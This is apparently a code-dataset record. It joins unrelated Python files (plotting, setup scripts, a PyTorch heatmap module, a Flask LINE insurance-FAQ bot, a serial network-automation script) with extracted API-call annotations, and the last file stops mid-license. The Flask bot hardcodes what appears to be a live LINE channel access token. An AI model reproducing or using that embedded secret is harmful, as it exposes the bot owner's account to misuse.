#create multindex dataframe
arrays = [['Fruit', 'Fruit', 'Fruit', 'Veggies', 'Veggies', 'Veggies'],
['Bananas', 'Oranges', 'Pears', 'Carrots', 'Potatoes', 'Celery']]
index = pd.MultiIndex.from_tuples(list(zip(*arrays)))
df = pd.DataFrame(np.random.randint(10, 50, size=(1, 6)), columns=index)
#plotting
fig, axes = plt.subplots(nrows=1, ncols=2, sharey=True, figsize=(14 / 2.54, 10 / 2.54)) # width, height
for i, col in enumerate(df.columns.levels[0]):
print(col)
ax = axes[i]
df[col].T.plot(ax=ax, kind='bar', width=.8)
ax.legend_.remove()
ax.set_xlabel(col, weight='bold')
ax.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4)
ax.set_axisbelow(True)
for tick in ax.get_xticklabels():
tick.set_rotation(0)
#make the ticklines invisible
ax.tick_params(axis=u'both', which=u'both', length=0)
plt.tight_layout()
# remove spacing in between
fig.subplots_adjust(wspace=0) # space between plots
plt.show()
|
[
"matplotlib.pyplot.tight_layout",
"numpy.random.randint",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
] |
[((398, 473), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(2)', 'sharey': '(True)', 'figsize': '(14 / 2.54, 10 / 2.54)'}), '(nrows=1, ncols=2, sharey=True, figsize=(14 / 2.54, 10 / 2.54))\n', (410, 473), True, 'import matplotlib.pyplot as plt\n'), ((943, 961), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (959, 961), True, 'import matplotlib.pyplot as plt\n'), ((1044, 1054), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1052, 1054), True, 'import matplotlib.pyplot as plt\n'), ((320, 358), 'numpy.random.randint', 'np.random.randint', (['(10)', '(50)'], {'size': '(1, 6)'}), '(10, 50, size=(1, 6))\n', (337, 358), True, 'import numpy as np\n')]
|
from setuptools import setup, find_packages
requires = []
setup(
name='izon',
version='2018.5.24',
description='A dependency handling tool for files',
url='https://github.com/kmu/izon',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
keywords='dependency time',
packages=find_packages(),
install_requires=requires,
classifiers=[
'Topic :: System :: Filesystems',
],
)
|
[
"setuptools.find_packages"
] |
[((317, 332), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (330, 332), False, 'from setuptools import setup, find_packages\n')]
|
#!/usr/bin/env python
import setuptools
import os
os.chmod("examples/run.py", 0o744)
os.chmod("examples/run_MNIST.py", 0o744)
os.chmod("examples/run_distributed.py", 0o744)
setuptools.setup(
name="hamiltonianNet",
version="0.0.1",
author="<NAME>",
author_email="<EMAIL>",
description="PyTorch package for Hamiltonian DNNs",
url="https://github.com/ClaraGalimberti/hamiltonianNet",
packages=setuptools.find_packages(),
install_requires=['torch>=1.4.0',
'numpy>=1.18.1',
'matplotlib>=3.1.3',
'torchvision>=0.5.0'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
],
python_requires='>=3.6',
)
|
[
"os.chmod",
"setuptools.find_packages"
] |
[((52, 84), 'os.chmod', 'os.chmod', (['"""examples/run.py"""', '(484)'], {}), "('examples/run.py', 484)\n", (60, 84), False, 'import os\n'), ((87, 125), 'os.chmod', 'os.chmod', (['"""examples/run_MNIST.py"""', '(484)'], {}), "('examples/run_MNIST.py', 484)\n", (95, 125), False, 'import os\n'), ((128, 172), 'os.chmod', 'os.chmod', (['"""examples/run_distributed.py"""', '(484)'], {}), "('examples/run_distributed.py', 484)\n", (136, 172), False, 'import os\n'), ((421, 447), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (445, 447), False, 'import setuptools\n')]
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
class CornerDet(nn.Module):
def __init__(self):
super(CornerDet, self).__init__()
def forward(self, x_f):
raise NotImplementedError
class SepCornerDet(CornerDet):
def __init__(self, feat_in=256):
super(SepCornerDet, self).__init__()
self.up0_l = nn.Sequential(
nn.Conv2d(feat_in, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 64, 1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
)
self.up1_l = nn.Sequential(
nn.Conv2d(64, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, 1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
)
self.up2_l = nn.Sequential(
nn.Conv2d(32, 32, 3, padding=1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(32, 1, 1),
)
self.up0_r = nn.Sequential(
nn.Conv2d(feat_in, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 64, 1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
)
self.up1_r = nn.Sequential(
nn.Conv2d(64, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, 1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
)
self.up2_r = nn.Sequential(
nn.Conv2d(32, 32, 3, padding=1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(32, 1, 1),
)
for m in self.modules():
if isinstance(m, (nn.Conv2d, nn.ConvTranspose2d, nn.Linear)):
nn.init.kaiming_normal_(
m.weight.data, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1.0)
m.bias.data.zero_()
def forward(self, x_f):
x_f_l, x_f_r = x_f
x_f_l = self.up0_l(x_f_l)
resolution = x_f_l.shape[-1]
x_f_l = self.up1_l(F.interpolate(
x_f_l, size=(resolution*2+1, resolution*2+1)))
resolution = x_f_l.shape[-1]
heat_map_l = self.up2_l(F.interpolate(
x_f_l, size=(resolution*2+1, resolution*2+1)))
batch_sz = x_f_l.shape[0]
left_top_map = F.softmax(heat_map_l.squeeze().reshape(batch_sz, -1), 1).reshape(
batch_sz, heat_map_l.shape[-2], heat_map_l.shape[-1])
x_f_r = self.up0_r(x_f_r)
resolution = x_f_r.shape[-1]
x_f_r = self.up1_r(F.interpolate(
x_f_r, size=(resolution*2+1, resolution*2+1)))
resolution = x_f_r.shape[-1]
heat_map_r = self.up2_r(F.interpolate(
x_f_r, size=(resolution*2+1, resolution*2+1)))
batch_sz = x_f_r.shape[0]
right_bottom_map = F.softmax(heat_map_r.squeeze().reshape(batch_sz, -1), 1).reshape(
batch_sz, heat_map_r.shape[-2], heat_map_r.shape[-1])
heatmap_size = left_top_map.shape[-1]
xx, yy = np.meshgrid([dx for dx in range(int(heatmap_size))],
[dy for dy in range(int(heatmap_size))])
heatmap_xx = torch.from_numpy(xx).float().cuda()
heatmap_yy = torch.from_numpy(yy).float().cuda()
x1 = ((left_top_map * heatmap_xx).sum(-1).sum(-1) /
heatmap_xx.shape[-1]).reshape(-1, 1)
y1 = ((left_top_map * heatmap_yy).sum(-1).sum(-1) /
heatmap_xx.shape[-2]).reshape(-1, 1)
x2 = ((right_bottom_map * heatmap_xx).sum(-1).sum(-1) /
heatmap_xx.shape[-1]).reshape(-1, 1)
y2 = ((right_bottom_map * heatmap_yy).sum(-1).sum(-1) /
heatmap_xx.shape[-2]).reshape(-1, 1)
result_target = torch.cat((x1, y1, x2, y2), 1)
return result_target, left_top_map.shape[-1]
|
[
"torch.nn.ReLU",
"torch.nn.init.kaiming_normal_",
"torch.nn.Conv2d",
"torch.cat",
"torch.nn.BatchNorm2d",
"torch.nn.functional.interpolate",
"torch.from_numpy"
] |
[((3995, 4025), 'torch.cat', 'torch.cat', (['(x1, y1, x2, y2)', '(1)'], {}), '((x1, y1, x2, y2), 1)\n', (4004, 4025), False, 'import torch\n'), ((409, 446), 'torch.nn.Conv2d', 'nn.Conv2d', (['feat_in', '(256)', '(3)'], {'padding': '(1)'}), '(feat_in, 256, 3, padding=1)\n', (418, 446), True, 'import torch.nn as nn\n'), ((460, 479), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(256)'], {}), '(256)\n', (474, 479), True, 'import torch.nn as nn\n'), ((493, 514), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (500, 514), True, 'import torch.nn as nn\n'), ((528, 549), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(64)', '(1)'], {}), '(256, 64, 1)\n', (537, 549), True, 'import torch.nn as nn\n'), ((563, 581), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(64)'], {}), '(64)\n', (577, 581), True, 'import torch.nn as nn\n'), ((595, 616), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (602, 616), True, 'import torch.nn as nn\n'), ((677, 708), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(64)', '(3)'], {'padding': '(1)'}), '(64, 64, 3, padding=1)\n', (686, 708), True, 'import torch.nn as nn\n'), ((722, 740), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(64)'], {}), '(64)\n', (736, 740), True, 'import torch.nn as nn\n'), ((754, 775), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (761, 775), True, 'import torch.nn as nn\n'), ((789, 809), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(32)', '(1)'], {}), '(64, 32, 1)\n', (798, 809), True, 'import torch.nn as nn\n'), ((823, 841), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(32)'], {}), '(32)\n', (837, 841), True, 'import torch.nn as nn\n'), ((855, 876), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (862, 876), True, 'import torch.nn as nn\n'), ((937, 968), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(32)', '(3)'], {'padding': '(1)'}), '(32, 32, 3, padding=1)\n', (946, 968), True, 'import torch.nn as nn\n'), ((982, 1000), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(32)'], {}), '(32)\n', (996, 1000), True, 'import torch.nn as nn\n'), ((1014, 1035), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1021, 1035), True, 'import torch.nn as nn\n'), ((1049, 1068), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(1)', '(1)'], {}), '(32, 1, 1)\n', (1058, 1068), True, 'import torch.nn as nn\n'), ((1129, 1166), 'torch.nn.Conv2d', 'nn.Conv2d', (['feat_in', '(256)', '(3)'], {'padding': '(1)'}), '(feat_in, 256, 3, padding=1)\n', (1138, 1166), True, 'import torch.nn as nn\n'), ((1180, 1199), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(256)'], {}), '(256)\n', (1194, 1199), True, 'import torch.nn as nn\n'), ((1213, 1234), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1220, 1234), True, 'import torch.nn as nn\n'), ((1248, 1269), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(64)', '(1)'], {}), '(256, 64, 1)\n', (1257, 1269), True, 'import torch.nn as nn\n'), ((1283, 1301), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(64)'], {}), '(64)\n', (1297, 1301), True, 'import torch.nn as nn\n'), ((1315, 1336), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1322, 1336), True, 'import torch.nn as nn\n'), ((1397, 1428), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(64)', '(3)'], {'padding': '(1)'}), '(64, 64, 3, padding=1)\n', (1406, 1428), True, 'import torch.nn as nn\n'), ((1442, 1460), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(64)'], {}), '(64)\n', (1456, 1460), True, 'import torch.nn as nn\n'), ((1474, 1495), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1481, 1495), True, 'import torch.nn as nn\n'), ((1509, 1529), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(32)', '(1)'], {}), '(64, 32, 1)\n', (1518, 1529), True, 'import torch.nn as nn\n'), ((1543, 1561), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(32)'], {}), '(32)\n', (1557, 1561), True, 'import torch.nn as nn\n'), ((1575, 1596), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1582, 1596), True, 'import torch.nn as nn\n'), ((1657, 1688), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(32)', '(3)'], {'padding': '(1)'}), '(32, 32, 3, padding=1)\n', (1666, 1688), True, 'import torch.nn as nn\n'), ((1702, 1720), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(32)'], {}), '(32)\n', (1716, 1720), True, 'import torch.nn as nn\n'), ((1734, 1755), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1741, 1755), True, 'import torch.nn as nn\n'), ((1769, 1788), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(1)', '(1)'], {}), '(32, 1, 1)\n', (1778, 1788), True, 'import torch.nn as nn\n'), ((2300, 2367), 'torch.nn.functional.interpolate', 'F.interpolate', (['x_f_l'], {'size': '(resolution * 2 + 1, resolution * 2 + 1)'}), '(x_f_l, size=(resolution * 2 + 1, resolution * 2 + 1))\n', (2313, 2367), True, 'import torch.nn.functional as F\n'), ((2443, 2510), 'torch.nn.functional.interpolate', 'F.interpolate', (['x_f_l'], {'size': '(resolution * 2 + 1, resolution * 2 + 1)'}), '(x_f_l, size=(resolution * 2 + 1, resolution * 2 + 1))\n', (2456, 2510), True, 'import torch.nn.functional as F\n'), ((2806, 2873), 'torch.nn.functional.interpolate', 'F.interpolate', (['x_f_r'], {'size': '(resolution * 2 + 1, resolution * 2 + 1)'}), '(x_f_r, size=(resolution * 2 + 1, resolution * 2 + 1))\n', (2819, 2873), True, 'import torch.nn.functional as F\n'), ((2949, 3016), 'torch.nn.functional.interpolate', 'F.interpolate', (['x_f_r'], {'size': '(resolution * 2 + 1, resolution * 2 + 1)'}), '(x_f_r, size=(resolution * 2 + 1, resolution * 2 + 1))\n', (2962, 3016), True, 'import torch.nn.functional as F\n'), ((1924, 1999), 'torch.nn.init.kaiming_normal_', 'nn.init.kaiming_normal_', (['m.weight.data'], {'mode': '"""fan_out"""', 'nonlinearity': '"""relu"""'}), "(m.weight.data, mode='fan_out', nonlinearity='relu')\n", (1947, 1999), True, 'import torch.nn as nn\n'), ((3424, 3444), 'torch.from_numpy', 'torch.from_numpy', (['xx'], {}), '(xx)\n', (3440, 3444), False, 'import torch\n'), ((3481, 3501), 'torch.from_numpy', 'torch.from_numpy', (['yy'], {}), '(yy)\n', (3497, 3501), False, 'import torch\n')]
|
# coding: utf-8
"""
Layered Insight Scan
Layered Insight Scan performs static vulnerability analysis, license and package compliance. You can find out more about Scan at http://layeredinsight.com.
OpenAPI spec version: 0.9.4
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import layint_scan_api
from layint_scan_api.rest import ApiException
from layint_scan_api.apis.registry_api import RegistryApi
class TestRegistryApi(unittest.TestCase):
""" RegistryApi unit test stubs """
def setUp(self):
self.api = layint_scan_api.apis.registry_api.RegistryApi()
def tearDown(self):
pass
def test_add_ecr_creds(self):
"""
Test case for add_ecr_creds
Add credentials for AWS ECR
"""
pass
def test_add_registry(self):
"""
Test case for add_registry
Add a new registry
"""
pass
def test_delete_registry(self):
"""
Test case for delete_registry
Deletes a registry
"""
pass
def test_get_registries(self):
"""
Test case for get_registries
List all registries available to the user
"""
pass
def test_get_registry_by_id(self):
"""
Test case for get_registry_by_id
Find registry by ID
"""
pass
def test_update_registry(self):
"""
Test case for update_registry
Updates a registry with form data
"""
pass
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"layint_scan_api.apis.registry_api.RegistryApi"
] |
[((1668, 1683), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1681, 1683), False, 'import unittest\n'), ((667, 714), 'layint_scan_api.apis.registry_api.RegistryApi', 'layint_scan_api.apis.registry_api.RegistryApi', ([], {}), '()\n', (712, 714), False, 'import layint_scan_api\n')]
|
from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort
from getData.runAIML import runAIML
import re
from linebot import (
LineBotApi, WebhookHandler
)
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import *
application = Flask(__name__, static_url_path='', template_folder='templates')
line_bot_api = LineBotApi('9fDKzAaq/ia4Zi0yQwuTEnGM9A+vJj8aUqGE74mo1Qp6gmgs0ALwcJnGE15molA+aI8sRwyK1G67ar+cVDjvNg6lp8gBP98N3BQpqaIm4/pTS9KD1XvHq6PnRsR/UL/TYHzhv8vw3FOi/7dNwgzuPQdB04t89/1O/w1cDnyilFU=')
handler = WebhookHandler('<KEY>')
@application.route("/")
def index():
return render_template('index.html')
@application.route('/img/<path:path>')
def send_img(path):
return send_from_directory('img', path)
@application.route('/statics/<path:path>')
def send_statics(path):
return send_from_directory('statics', path)
@application.route('/_add_numbers')
def add_numbers():
query = request.args.get('query')
query = query.upper()
query = re.sub('臺','台',query)
reply = '我不知道你在說什麼'
try:
#請問本公司之續次保費繳費方式有哪些?
if(re.search('續', query)!=None):
if (re.search('保費|保險費', query)!=None):
if (re.search('繳', query)!=None):
reply = '本公司之續次保費繳費方式:人員收費、金融機構轉帳、信用卡代繳、保戶自行繳費(如郵撥..)'
#我收到繳費通知,但沒有人來收保費應該怎麼辦?
elif(re.search('沒有', query)!=None):
if (re.search('收', query)!=None):
if (re.search('保費', query)!=None):
reply = '1. 您可以依繳費通知上記載之收費單位地址、電話逕與收費人員連絡。 2. 您可以撥打保戶服務專線0809-000-550與本公司連絡,來電時請留下保單號碼、電話及地址,以便通知收費人員與您連絡。'
#請問支票抬頭應如何開立?
elif(re.search('支票', query)!=None):
if (re.search('抬頭', query)!=None):
reply = '本公司之續次保費繳費方式:人員收費、金融機構轉帳、信用卡代繳、保戶自行繳費(如郵撥..)'
#我若移居國外,其收費情形應如何處理?
elif(re.search('國外', query)!=None):
if (re.search('收費', query)!=None):
reply = '本公司在國外並未設立營業據點,無法受理保戶將收費地址變更至國外,所以保戶移居國外,仍須於國內留有收費地址,可委託國內之親友代繳或以自動轉帳、信用卡方式扣繳保費(仍須於國內設有轉帳帳戶)。'
#我的保單服務員是誰?
elif(re.search('保單', query)!=None):
if (re.search('服務員', query)!=None):
reply = '富邦金控官網中的「人壽保戶會員專區」有提供保單相關資料的查詢。您必須是富邦保戶並申請加入會員,即可透過網路查詢到以您為要保人的相關保單資料。'
#要、被保人非同一人,要保人不幸死亡,應如何變更要保人?
elif(re.search('要保人', query)!=None):
if (re.search('死亡', query)!=None):
reply = '原要保人死亡時,該保險契約視同要保人之遺產,應由其繼承人中推舉一與被保險人具“保險利益”(依保險法第十六條規定)者繼承該保單。應備文件如下:(1) 契約變更申請書。 (2) 原要保人死亡證明或除戶證明。 (3) 全部戶籍謄本(以認定其所有繼承人)。 (4) 法定繼承人聲明同意書:原要保人之所有法定繼承人,一一於同意書親自簽章,以聲明同意讓受該保險契約由所指定之新要保人持有。'
#保險單上要保人或被保險人姓名、出生日期、性別或身分證號碼錯誤時,應如何處理?
elif(re.search('錯誤', query)!=None):
if (re.search('姓名|生日|姓別|身分證|資料', query)!=None):
reply = '要保書填載錯誤:(1) 請檢附契約變更申請書及證明文件,依變更程序辦理。 (2) 出生日期更正,如涉及保險年齡異動,則依變更後保險年齡重新計算保險費,並依保單條款規定補退保費差額;變更後契約內容依投保規定辦理。(3) 性別更正,依變更後性別重新計算保險費,並補退保費差額。'
#要保人(或被保險人)更改名時,應如何處理?
elif(re.search('更改|變更|更|改', query)!=None):
if (re.search('姓名|名', query)!=None):
reply = '1. 請檢附契約變更申請書及戶籍謄本,依變更程序辦理。 2. 於要保人(或被保險人)簽章處簽立原姓名(即要保書原留樣式)及更改後之姓名。'
#保險費自動墊繳意願應如何變更?
elif(re.search('保費|保險費', query)!=None):
if (re.search('自動墊繳意願', query)!=None):
reply = '1. 隨時均可提出申請,但若保單已進入自動墊繳,現欲變更為停止保險費自動墊繳,則墊繳意願變更之生效日為次一墊繳日。 2. 應備妥「契約變更申請書」,由要保人提出申請。'
#被保險人職業內容變動該如何辦理?
elif(re.search('職業|工作', query)!=None):
if (re.search('更改|變更|變動|換', query)!=None):
reply = '被保險人之實際工作內容有變動時,保戶應即時以書面通知保險公司,填寫契約變更申請書辦理變更。'
#如何辦理地址之變更?
#受益人可否變更?應如何申請?
#保戶欲辦理變更為「減額繳清保險」應如何辦理?
#保戶欲辦理變更為「展期定期保險」應如何辦理?
#辦理繳別變更,應備什麼文件及注意事項?
#何謂繳費方式變更?
#保單遺失如何申請補發?
#主契約保險金額之縮小應如何提出申請?
#投保當時如無附加一年期附約,中途可否附加?
#保戶若申請附約取消或縮小保額時,可否退費?
#保戶若申請附約新加保,應如何辦理?
#主契約可轉換之作業與險種規定為何?
#什麼情形不得申請轉換契約?
else:
query = query.upper()
response = runAIML(query)
if response != '':
reply = response
else:
raise Exception
except Exception as e:
print(e)
pass
return jsonify(result=reply)
@application.route("/callback", methods=['POST'])
def callback():
# get X-Line-Signature header value
signature = request.headers['X-Line-Signature']
# get request body as text
body = request.get_data(as_text=True)
# print("body:",body)
application.logger.info("Request body: " + body)
# handle webhook body
try:
handler.handle(body, signature)
except InvalidSignatureError:
abort(400)
return 'ok'
if __name__ == "__main__":
application.run()
|
[
"getData.runAIML.runAIML",
"flask.request.args.get",
"flask.Flask",
"linebot.LineBotApi",
"flask.abort",
"flask.jsonify",
"flask.request.get_data",
"flask.render_template",
"re.search",
"flask.send_from_directory",
"re.sub",
"linebot.WebhookHandler"
] |
[((310, 374), 'flask.Flask', 'Flask', (['__name__'], {'static_url_path': '""""""', 'template_folder': '"""templates"""'}), "(__name__, static_url_path='', template_folder='templates')\n", (315, 374), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((391, 587), 'linebot.LineBotApi', 'LineBotApi', (['"""9fDKzAaq/ia4Zi0yQwuTEnGM9A+vJj8aUqGE74mo1Qp6gmgs0ALwcJnGE15molA+aI8sRwyK1G67ar+cVDjvNg6lp8gBP98N3BQpqaIm4/pTS9KD1XvHq6PnRsR/UL/TYHzhv8vw3FOi/7dNwgzuPQdB04t89/1O/w1cDnyilFU="""'], {}), "(\n '9fDKzAaq/ia4Zi0yQwuTEnGM9A+vJj8aUqGE74mo1Qp6gmgs0ALwcJnGE15molA+aI8sRwyK1G67ar+cVDjvNg6lp8gBP98N3BQpqaIm4/pTS9KD1XvHq6PnRsR/UL/TYHzhv8vw3FOi/7dNwgzuPQdB04t89/1O/w1cDnyilFU='\n )\n", (401, 587), False, 'from linebot import LineBotApi, WebhookHandler\n'), ((588, 611), 'linebot.WebhookHandler', 'WebhookHandler', (['"""<KEY>"""'], {}), "('<KEY>')\n", (602, 611), False, 'from linebot import LineBotApi, WebhookHandler\n'), ((662, 691), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (677, 691), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((763, 795), 'flask.send_from_directory', 'send_from_directory', (['"""img"""', 'path'], {}), "('img', path)\n", (782, 795), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((875, 911), 'flask.send_from_directory', 'send_from_directory', (['"""statics"""', 'path'], {}), "('statics', path)\n", (894, 911), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((980, 1005), 'flask.request.args.get', 'request.args.get', (['"""query"""'], {}), "('query')\n", (996, 1005), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((1044, 1067), 're.sub', 're.sub', (['"""臺"""', '"""台"""', 'query'], {}), "('臺', '台', query)\n", (1050, 1067), False, 'import re\n'), ((4396, 4417), 'flask.jsonify', 'jsonify', ([], {'result': 'reply'}), '(result=reply)\n', (4403, 4417), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((4619, 4649), 'flask.request.get_data', 'request.get_data', ([], {'as_text': '(True)'}), '(as_text=True)\n', (4635, 4649), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((1153, 1174), 're.search', 're.search', (['"""續"""', 'query'], {}), "('續', query)\n", (1162, 1174), False, 'import re\n'), ((4847, 4857), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (4852, 4857), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((1199, 1225), 're.search', 're.search', (['"""保費|保險費"""', 'query'], {}), "('保費|保險費', query)\n", (1208, 1225), False, 'import re\n'), ((1405, 1427), 're.search', 're.search', (['"""沒有"""', 'query'], {}), "('沒有', query)\n", (1414, 1427), False, 'import re\n'), ((1254, 1275), 're.search', 're.search', (['"""繳"""', 'query'], {}), "('繳', query)\n", (1263, 1275), False, 'import re\n'), ((1452, 1473), 're.search', 're.search', (['"""收"""', 'query'], {}), "('收', query)\n", (1461, 1473), False, 'import re\n'), ((1705, 1727), 're.search', 're.search', (['"""支票"""', 'query'], {}), "('支票', query)\n", (1714, 1727), False, 'import re\n'), ((1502, 1524), 're.search', 're.search', (['"""保費"""', 'query'], {}), "('保費', query)\n", (1511, 1524), False, 'import re\n'), ((1752, 1774), 're.search', 're.search', (['"""抬頭"""', 'query'], {}), "('抬頭', query)\n", (1761, 1774), False, 'import re\n'), ((1896, 1918), 're.search', 're.search', (['"""國外"""', 'query'], {}), "('國外', query)\n", (1905, 1918), False, 'import re\n'), ((1943, 1965), 're.search', 're.search', (['"""收費"""', 'query'], {}), "('收費', query)\n", (1952, 1965), False, 'import re\n'), ((2128, 2150), 're.search', 're.search', (['"""保單"""', 'query'], {}), "('保單', query)\n", (2137, 2150), False, 'import re\n'), ((4144, 4158), 'getData.runAIML.runAIML', 'runAIML', (['query'], {}), '(query)\n', (4151, 4158), False, 'from getData.runAIML import runAIML\n'), ((2175, 2198), 're.search', 're.search', (['"""服務員"""', 'query'], {}), "('服務員', query)\n", (2184, 2198), False, 'import re\n'), ((2367, 2390), 're.search', 're.search', (['"""要保人"""', 'query'], {}), "('要保人', query)\n", (2376, 2390), False, 'import re\n'), ((2419, 2441), 're.search', 're.search', (['"""死亡"""', 'query'], {}), "('死亡', query)\n", (2428, 2441), False, 'import re\n'), ((2738, 2760), 're.search', 're.search', (['"""錯誤"""', 'query'], {}), "('錯誤', query)\n", (2747, 2760), False, 'import re\n'), ((2789, 2824), 're.search', 're.search', (['"""姓名|生日|姓別|身分證|資料"""', 'query'], {}), "('姓名|生日|姓別|身分證|資料', query)\n", (2798, 2824), False, 'import re\n'), ((3048, 3077), 're.search', 're.search', (['"""更改|變更|更|改"""', 'query'], {}), "('更改|變更|更|改', query)\n", (3057, 3077), False, 'import re\n'), ((3106, 3130), 're.search', 're.search', (['"""姓名|名"""', 'query'], {}), "('姓名|名', query)\n", (3115, 3130), False, 'import re\n'), ((3280, 3306), 're.search', 're.search', (['"""保費|保險費"""', 'query'], {}), "('保費|保險費', query)\n", (3289, 3306), False, 'import re\n'), ((3335, 3361), 're.search', 're.search', (['"""自動墊繳意願"""', 'query'], {}), "('自動墊繳意願', query)\n", (3344, 3361), False, 'import re\n'), ((3527, 3552), 're.search', 're.search', (['"""職業|工作"""', 'query'], {}), "('職業|工作', query)\n", (3536, 3552), False, 'import re\n'), ((3581, 3611), 're.search', 're.search', (['"""更改|變更|變動|換"""', 'query'], {}), "('更改|變更|變動|換', query)\n", (3590, 3611), False, 'import re\n')]
|
import sys
from context import *
from netautomation import SerialDevice
from netautomation import Handler
PORT = 'COM5'
BAUDRATE = 9600
def main():
device = SerialDevice(PORT, BAUDRATE)
handler = Handler()
handler.bind_device(device)
device.set_credentials('cisco', 'class')
connected = device.connect()
if not connected:
print('Port is closed. Exiting.')
sys.exit()
print('Connection successful.')
try:
while True:
stdin = input('>').strip()
if stdin == '!exit':
handler.execute('exit')
break
stdout = handler.execute(stdin)
print(stdout)
except:
handler.execute('exit')
raise
if __name__ == '__main__':
main()
|
[
"netautomation.Handler",
"netautomation.SerialDevice",
"sys.exit"
] |
[((166, 194), 'netautomation.SerialDevice', 'SerialDevice', (['PORT', 'BAUDRATE'], {}), '(PORT, BAUDRATE)\n', (178, 194), False, 'from netautomation import SerialDevice\n'), ((209, 218), 'netautomation.Handler', 'Handler', ([], {}), '()\n', (216, 218), False, 'from netautomation import Handler\n'), ((404, 414), 'sys.exit', 'sys.exit', ([], {}), '()\n', (412, 414), False, 'import sys\n')]
|
#!/usr/bin/env python3
#
# Electrum ABC - lightweight eCash client
# Copyright (C) 2022 The Electrum ABC developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
